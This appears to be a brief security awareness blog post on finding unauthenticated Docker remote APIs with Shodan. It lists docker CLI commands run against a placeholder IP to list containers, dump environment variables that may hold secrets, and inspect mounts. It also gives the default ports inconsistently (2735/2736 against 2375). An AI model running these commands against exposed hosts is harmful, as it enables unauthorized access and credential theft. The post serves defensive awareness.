Hacking ‘Docker’, the Shodan way!

Never leave your docker host publicly exposed!

Shodan Query to list docker host APIs listening on port 2375
By default, the Docker host remote API listens on ports 2735 / 2736 and has no authentication. If the port is not blocked, docker host APIs can be accessed over public internet.
docker -H X.X.X.X:2375 ps -a
Docker containers listing
docker -H X.X.X.X:2375 exec -i container_id env
Docker container environment variables
docker -H X.X.X.X:2375 inspect container_id
Docker inspect container

Securing your docker container is as important as securing your docker host.

docker inspect -f '{{ .Mounts }}' container_id
Sample image — Mount point listing

Never leave your docker host publicly exposed!

Lead Infrastructure Security Engineer | DevSecOps | Speaker | Breaking stuff to learn | Featured in Forbes, BBC| Acknowledged by Google, NASA, Yahoo, UN etc